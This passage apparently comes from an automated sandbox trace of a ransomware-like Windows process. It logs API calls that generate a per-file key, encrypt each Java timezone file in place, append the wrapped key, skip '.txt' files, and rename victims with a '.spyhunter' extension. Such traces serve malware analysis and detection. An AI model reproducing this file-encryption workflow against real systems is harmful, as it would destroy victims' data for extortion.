lpNumberOfBytesRead=0x25ce4bc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce4bc*=0x41, lpOverlapped=0x0) returned 1 [0169.441] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.441] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x25ce4bc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce4bc*=0x41, lpOverlapped=0x0) returned 1 [0169.441] GetProcessHeap () returned 0x2c0000 [0169.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.441] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.441] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce4fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce4bc, lpOverlapped=0x0 | out: lpBuffer=0x25ce4fc*, lpNumberOfBytesWritten=0x25ce4bc*=0x4, lpOverlapped=0x0) returned 1 [0169.441] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce4bc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce4bc*=0x30, lpOverlapped=0x0) returned 1 [0169.442] CloseHandle (hObject=0xa0) returned 1 [0169.442] GetProcessHeap () returned 0x2c0000 [0169.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0169.442] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh.spyhunter") returned 65 [0169.442] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh.spyhunter")) returned 1 [0169.442] GetProcessHeap () returned 0x2c0000 [0169.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0169.442] GetProcessHeap () returned 0x2c0000 [0169.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0169.443] GetProcessHeap () returned 0x2c0000 [0169.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f27930 | out: hHeap=0x2c0000) returned 1 [0169.443] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce4f8 | out: pbBuffer=0x25ce4f8) returned 1 [0169.443] GetProcessHeap () returned 0x2c0000 [0169.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0169.443] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce4f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce4f0*=0x30) returned 1 [0169.443] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jayapura" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\jayapura"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.443] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jayapura") returned 57 [0169.443] StrStrW (lpFirst="Jayapura", lpSrch=".txt") returned 0x0 [0169.443] GetProcessHeap () returned 0x2c0000 [0169.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.443] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce4b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce4b4*=0x55, lpOverlapped=0x0) returned 1 [0169.444] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffab, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.444] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x25ce4b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce4b4*=0x55, lpOverlapped=0x0) returned 1 [0169.444] GetProcessHeap () returned 0x2c0000 [0169.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.444] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.444] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce4f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce4b4, lpOverlapped=0x0 | out: lpBuffer=0x25ce4f4*, lpNumberOfBytesWritten=0x25ce4b4*=0x4, lpOverlapped=0x0) returned 1 [0169.445] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce4b4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce4b4*=0x30, lpOverlapped=0x0) returned 1 [0169.445] CloseHandle (hObject=0xa0) returned 1 [0169.445] GetProcessHeap () returned 0x2c0000 [0169.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0169.445] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jayapura.spyhunter") returned 67 [0169.445] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jayapura" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\jayapura"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jayapura.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\jayapura.spyhunter")) returned 1 [0169.445] GetProcessHeap () returned 0x2c0000 [0169.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0169.445] GetProcessHeap () returned 0x2c0000 [0169.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0169.446] GetProcessHeap () returned 0x2c0000 [0169.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eba300 | out: hHeap=0x2c0000) returned 1 [0169.446] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce4f8 | out: pbBuffer=0x25ce4f8) returned 1 [0169.446] GetProcessHeap () returned 0x2c0000 [0169.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0169.446] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce4f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce4f0*=0x30) returned 1 [0169.446] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jakarta" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\jakarta"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.491] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jakarta") returned 56 [0169.491] StrStrW (lpFirst="Jakarta", lpSrch=".txt") returned 0x0 [0169.491] GetProcessHeap () returned 0x2c0000 [0169.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0169.491] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce4b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce4b4*=0x81, lpOverlapped=0x0) returned 1 [0169.492] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffff7f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.492] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x81, lpNumberOfBytesWritten=0x25ce4b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce4b4*=0x81, lpOverlapped=0x0) returned 1 [0169.492] GetProcessHeap () returned 0x2c0000 [0169.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0169.492] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.492] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce4f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce4b4, lpOverlapped=0x0 | out: lpBuffer=0x25ce4f4*, lpNumberOfBytesWritten=0x25ce4b4*=0x4, lpOverlapped=0x0) returned 1 [0169.492] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce4b4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce4b4*=0x30, lpOverlapped=0x0) returned 1 [0169.493] CloseHandle (hObject=0xa0) returned 1 [0169.493] GetProcessHeap () returned 0x2c0000 [0169.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.493] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jakarta.spyhunter") returned 66 [0169.493] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jakarta" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\jakarta"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jakarta.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\jakarta.spyhunter")) returned 1 [0169.493] GetProcessHeap () returned 0x2c0000 [0169.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.493] GetProcessHeap () returned 0x2c0000 [0169.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0169.493] GetProcessHeap () returned 0x2c0000 [0169.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eba240 | out: hHeap=0x2c0000) returned 1 [0169.494] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce4f0 | out: pbBuffer=0x25ce4f0) returned 1 [0169.494] GetProcessHeap () returned 0x2c0000 [0169.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0169.494] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce4e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce4e8*=0x30) returned 1 [0169.494] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Harbin" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\harbin"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.495] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Harbin") returned 55 [0169.495] StrStrW (lpFirst="Harbin", lpSrch=".txt") returned 0x0 [0169.495] GetProcessHeap () returned 0x2c0000 [0169.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0169.495] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce4ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce4ac*=0xcd, lpOverlapped=0x0) returned 1 [0169.496] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffff33, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.496] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xcd, lpNumberOfBytesWritten=0x25ce4ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce4ac*=0xcd, lpOverlapped=0x0) returned 1 [0169.496] GetProcessHeap () returned 0x2c0000 [0169.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0169.496] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.496] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce4ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce4ac, lpOverlapped=0x0 | out: lpBuffer=0x25ce4ec*, lpNumberOfBytesWritten=0x25ce4ac*=0x4, lpOverlapped=0x0) returned 1 [0169.496] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce4ac, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce4ac*=0x30, lpOverlapped=0x0) returned 1 [0169.496] CloseHandle (hObject=0xa0) returned 1 [0169.496] GetProcessHeap () returned 0x2c0000 [0169.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.496] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Harbin.spyhunter") returned 65 [0169.496] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Harbin" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\harbin"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Harbin.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\harbin.spyhunter")) returned 1 [0169.497] GetProcessHeap () returned 0x2c0000 [0169.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.497] GetProcessHeap () returned 0x2c0000 [0169.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0169.497] GetProcessHeap () returned 0x2c0000 [0169.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f27148 | out: hHeap=0x2c0000) returned 1 [0169.497] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce4f0 | out: pbBuffer=0x25ce4f0) returned 1 [0169.497] GetProcessHeap () returned 0x2c0000 [0169.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0169.497] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce4e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce4e8*=0x30) returned 1 [0169.497] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Gaza" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\gaza"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.498] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Gaza") returned 53 [0169.498] StrStrW (lpFirst="Gaza", lpSrch=".txt") returned 0x0 [0169.498] GetProcessHeap () returned 0x2c0000 [0169.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0169.498] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce4ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce4ac*=0x4d4, lpOverlapped=0x0) returned 1 [0169.559] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffb2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.559] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4d4, lpNumberOfBytesWritten=0x25ce4ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce4ac*=0x4d4, lpOverlapped=0x0) returned 1 [0169.559] GetProcessHeap () returned 0x2c0000 [0169.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0169.560] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.560] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce4ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce4ac, lpOverlapped=0x0 | out: lpBuffer=0x25ce4ec*, lpNumberOfBytesWritten=0x25ce4ac*=0x4, lpOverlapped=0x0) returned 1 [0169.560] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce4ac, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce4ac*=0x30, lpOverlapped=0x0) returned 1 [0169.560] CloseHandle (hObject=0xa0) returned 1 [0169.561] GetProcessHeap () returned 0x2c0000 [0169.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.562] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Gaza.spyhunter") returned 63 [0169.562] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Gaza" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\gaza"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Gaza.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\gaza.spyhunter")) returned 1 [0169.566] GetProcessHeap () returned 0x2c0000 [0169.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.566] GetProcessHeap () returned 0x2c0000 [0169.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0169.567] GetProcessHeap () returned 0x2c0000 [0169.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f27090 | out: hHeap=0x2c0000) returned 1 [0169.567] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce4e8 | out: pbBuffer=0x25ce4e8) returned 1 [0169.567] GetProcessHeap () returned 0x2c0000 [0169.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0169.567] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce4e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce4e0*=0x30) returned 1 [0169.567] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dili" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dili"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.568] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dili") returned 53 [0169.568] StrStrW (lpFirst="Dili", lpSrch=".txt") returned 0x0 [0169.568] GetProcessHeap () returned 0x2c0000 [0169.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.568] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce4a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce4a4*=0x5d, lpOverlapped=0x0) returned 1 [0169.568] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffa3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.569] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x5d, lpNumberOfBytesWritten=0x25ce4a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce4a4*=0x5d, lpOverlapped=0x0) returned 1 [0169.569] GetProcessHeap () returned 0x2c0000 [0169.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.569] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.569] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce4e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce4a4, lpOverlapped=0x0 | out: lpBuffer=0x25ce4e4*, lpNumberOfBytesWritten=0x25ce4a4*=0x4, lpOverlapped=0x0) returned 1 [0169.569] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce4a4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce4a4*=0x30, lpOverlapped=0x0) returned 1 [0169.569] CloseHandle (hObject=0xa0) returned 1 [0169.569] GetProcessHeap () returned 0x2c0000 [0169.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.569] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dili.spyhunter") returned 63 [0169.569] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dili" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dili"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dili.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dili.spyhunter")) returned 1 [0169.570] GetProcessHeap () returned 0x2c0000 [0169.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.570] GetProcessHeap () returned 0x2c0000 [0169.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0169.570] GetProcessHeap () returned 0x2c0000 [0169.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f26f20 | out: hHeap=0x2c0000) returned 1 [0169.570] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce4e8 | out: pbBuffer=0x25ce4e8) returned 1 [0169.570] GetProcessHeap () returned 0x2c0000 [0169.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0169.570] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce4e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce4e0*=0x30) returned 1 [0169.570] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dhaka" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dhaka"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.571] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dhaka") returned 54 [0169.571] StrStrW (lpFirst="Dhaka", lpSrch=".txt") returned 0x0 [0169.571] GetProcessHeap () returned 0x2c0000 [0169.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.571] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce4a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce4a4*=0x79, lpOverlapped=0x0) returned 1 [0169.572] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffff87, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.572] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x79, lpNumberOfBytesWritten=0x25ce4a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce4a4*=0x79, lpOverlapped=0x0) returned 1 [0169.572] GetProcessHeap () returned 0x2c0000 [0169.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.572] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.573] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce4e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce4a4, lpOverlapped=0x0 | out: lpBuffer=0x25ce4e4*, lpNumberOfBytesWritten=0x25ce4a4*=0x4, lpOverlapped=0x0) returned 1 [0169.573] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce4a4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce4a4*=0x30, lpOverlapped=0x0) returned 1 [0169.573] CloseHandle (hObject=0xa0) returned 1 [0169.573] GetProcessHeap () returned 0x2c0000 [0169.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.573] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: 